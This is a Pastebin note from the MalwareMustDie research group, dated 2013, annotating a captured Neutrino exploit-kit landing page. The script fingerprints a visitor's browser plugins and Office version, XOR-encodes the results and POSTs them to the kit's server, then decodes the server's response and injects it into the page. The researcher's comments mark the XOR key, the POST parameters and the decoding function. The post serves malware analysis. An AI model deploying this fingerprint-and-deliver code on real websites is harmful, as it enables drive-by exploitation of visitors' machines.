MalwareMustDie

#MalwareMustDie! New form of Neutrino EK landing page?

Jul 26th, 2013
683
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!
  2. // My personal note..
  3. // New form of Neutrino EK landing page?
  4. // A quest! Where's the XOR data now? :-D
  5.  
  6.  
  7. <script src='xsvhwjx.js'></script>
  8. <script src='qmqsfiutp.js'>
  9. </script><script src='hrcl.js'></script>
  10. <link href='xbbcukphokdo.css' rel='stylesheet'>
  11. <link href='nhpgbsrcogf.css' rel='stylesheet'>
  12. <link href='bbehoufqwh.css' rel='stylesheet'>
  13.  
  14. <script src='gdhclsjileqh.js'></script>
  15. <script src='nrezixfqsy.js'></script>
  16. <script src='sgxvswm.js'></script>
  17. <script src='ztblmkuxokfcyxgy.js'></script>
  18. <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect??
  19. <script src='dwwccp.js'></script>
  20. <script src='zkbvwzvq.js'></script>
  21.  
  22.  
  23. <script>
  24.  $(document).ready(function()
  25.  {
  26.    rq(
  27.         "51f2394faaa2cc390a075f4c",
  28.         "eyhuui",        // <== @malforsec & @malwaremustdie: OK this is the key :-)
  29.         "uvkotuiae",    // <=== @malwaremustdie: POST command value
  30.         "ngrdddfrrlrzro",
  31.         "gfsjmndvvz"
  32.      )
  33.  }
  34.  );
  35.  function rq(a,c,f,e,g)
  36.  {
  37.    var d=PluginDetect.getVersion,b=[];  // // <== @malwaremustdie: PoC of PluginDetect v0.8.0
  38.    b.push("hid:::"+a);
  39.    b.push("adobe_reader:::"+d("AdobeReader"));
  40.    b.push("java:::"+d("Java"));
  41.    b.push("flash:::"+d("Flash"));
  42.    b.push("quick_time:::"+d("QuickTime"));
  43.    b.push("real_player:::"+d("RealPlayer"));
  44.    b.push("shockwave:::"+d("Shockwave"));
  45.    b.push("silver_light:::"+d("Silverlight"));
  46.    b.push("vlc:::"+d("VLC"));
  47.    b.push("wmp:::"+d("WMP"));
  48.    b.push("office:::"+office_ver());
  49.    a={};
  50.    a[e]=c;                                        // <=== c = "51f2394faaa2cc390a075f4c"
  51.    a[g]=encodeURIComponent(www(b.join(";;;"),c));  // <== @malwaremustdie: Assembling the POST query.
  52.    $.post(f,a,function(a,
  53.    b)
  54.    {
  55.      $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function.
  56.    }
  57.    )
  58.  }
  59.  function www(a,c)        // <=== @malwaremustdie: XOR function name in camouflaged
  60.  {                      
  61.    for(var f="",e=0,g=0,e=0;e<a.length;e++) // <=== @malwaremustdie: XOR logic
  62.        g=Math.floor(e%c.length),
  63.        f+=String.fromCharCode(a.charCodeAt(e)^c.charCodeAt(g));
  64.    return f
  65.  }
  66.  function office_ver()
  67.  {
  68.    var a=0,c=0;
  69.    try
  70.    {
  71.      a=new ActiveXObject("SharePoint.OpenDocuments.4")
  72.    }
  73.    catch(f)
  74.    {
  75.    }
  76.    try
  77.    {
  78.      c=new ActiveXObject("SharePoint.OpenDocuments.3")
  79.    }
  80.    catch(e)
  81.    {
  82.    }  // <=== @malwaremustdie: here goes the exploit payloads access...
  83.    return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null
  84.  };
  85.  
  86. </script>
  87.  
  88.  
  89. ----
  90. #MalwareMustDie!
  91. @unixfreaxjp ~]$ date
  92. Sat Jul 27 01:17:40 JST 2013
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×